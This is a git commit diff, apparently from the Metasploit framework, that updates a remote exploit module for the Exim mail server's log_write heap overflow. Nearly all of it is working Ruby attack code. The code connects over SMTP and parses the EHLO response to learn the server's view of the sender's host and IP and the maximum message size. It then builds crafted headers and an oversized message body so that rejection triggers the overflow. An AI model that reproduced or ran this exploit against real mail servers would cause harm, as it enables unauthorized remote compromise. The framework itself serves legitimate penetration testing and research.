Automagic updates to jduck's exim module
git-svn-id: file:///home/svn/framework3/trunk@11277 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
d5fc9df054
commit
a683f7b7d4
|
@ -83,22 +83,77 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Originally discovered/reported Dec 2 2008
|
||||
'DisclosureDate' => 'Dec 7 2010', # as an actual security bug
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_advanced_options([
|
||||
OptString.new("SourceAddress", [false, "The IP or hostname of this system as the target will resolve it"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
from = datastore['MAILFROM']
|
||||
to = datastore['MAILTO']
|
||||
|
||||
helo_host = "X" # From the mixin
|
||||
#
|
||||
# Connect and grab the banner
|
||||
#
|
||||
ehlo = Rex::Text.rand_text_alphanumeric(8)
|
||||
connect
|
||||
print_status("Server: #{self.banner.strip}")
|
||||
ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
|
||||
|
||||
if self.banner =~ /Exim (4\.[789]\d)/
|
||||
print_error("Warning: Exim version #{$1} is not exploitable")
|
||||
end
|
||||
|
||||
if self.banner !~ /Exim/i
|
||||
print_error("Warning: Could not detect an Exim target")
|
||||
end
|
||||
|
||||
ehlo_resp.each_line do |line|
|
||||
print_status("EHLO: #{line.strip}")
|
||||
end
|
||||
|
||||
#
|
||||
# Determine the maximum message size
|
||||
#
|
||||
max_msg = 52428800
|
||||
msg_len = max_msg + 1000 # just for good measure
|
||||
if ehlo_resp.to_s =~ /250-SIZE (\d+)/
|
||||
max_msg = $1.to_i
|
||||
end
|
||||
|
||||
#
|
||||
# Determine what hostname the server sees
|
||||
#
|
||||
saddr = nil
|
||||
if ehlo_resp =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/
|
||||
ehlo = $1
|
||||
saddr = $2
|
||||
end
|
||||
|
||||
from = datastore['MAILFROM']
|
||||
to = datastore['MAILTO']
|
||||
|
||||
resp = raw_send_recv("MAIL FROM: #{from}\r\n")
|
||||
print_status("MAIL: #{resp.strip}")
|
||||
|
||||
resp = raw_send_recv("RCPT TO: #{to}\r\n")
|
||||
print_status("RCPT: #{resp.strip}")
|
||||
|
||||
resp = raw_send_recv("DATA\r\n")
|
||||
print_status("DATA: #{resp.strip}")
|
||||
|
||||
|
||||
#
|
||||
# Calculate the headers
|
||||
#
|
||||
msg_len = max_msg + (1024*256) # just for good measure
|
||||
log_buffer_size = 8192
|
||||
ip = Rex::Socket.source_address('1.2.3.4')
|
||||
source = saddr || datastore["SourceAddress"] || Rex::Socket.source_address('1.2.3.4')
|
||||
|
||||
print_status("Determined our hostname is #{ehlo} and IP address is #{source}")
|
||||
|
||||
# The initial headers will fill up the 'log_buffer' variable in 'log_write' function
|
||||
print_status("Constructing initial headers ...")
|
||||
log_buffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <#{from}> H=(#{helo_host}) [#{ip}]: message too big: read=#{msg_len} max=#{max_msg}\n"
|
||||
print_status("Constructing initial headers (source #{source})...")
|
||||
log_buffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <#{from}> H=(#{ehlo}) [#{source}]: message too big: read=#{msg_len} max=#{max_msg}\n"
|
||||
log_buffer << "Envelope-from: <#{from}>\nEnvelope-to: <#{to}>\n"
|
||||
|
||||
# Now, " " + hdrline for each header
|
||||
|
@ -135,28 +190,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# In order to trigger the overflow, we must get our message rejected.
|
||||
# To do so, we send a message that is larger than the maximum.
|
||||
|
||||
print_status("Constructing body ...")
|
||||
body = ''
|
||||
659883.times {
|
||||
body << ("MAILbomb" * 10) + "\n"
|
||||
}
|
||||
fill = (Rex::Text.rand_text_alphanumeric(254) + "\r\n") * 16384
|
||||
|
||||
body_len = 53450538 - (53477372-52428800) + 1
|
||||
while(body.length < msg_len)
|
||||
body << fill
|
||||
end
|
||||
body = body[0, msg_len]
|
||||
|
||||
print_status("Combining parts ...")
|
||||
data = ''
|
||||
data << hdrs1
|
||||
data << hdrx
|
||||
data << "\n"
|
||||
data << body
|
||||
|
||||
print_status("Connecting ...")
|
||||
connect_login
|
||||
print_status("Sending data ...")
|
||||
sock.put data
|
||||
sock.put hdrs1
|
||||
sock.put hdrx
|
||||
sock.put "\n"
|
||||
sock.put body
|
||||
|
||||
print_status("Ending first message.")
|
||||
buf = raw_send_recv("\n.\n")
|
||||
buf = raw_send_recv("\r\n.\r\n")
|
||||
# Should be: ""552 Message size exceeds maximum permitted\r\n"
|
||||
print_status("Result: #{buf.inspect}") if buf
|
||||
|
||||
|
|
Loading…
Reference in New Issue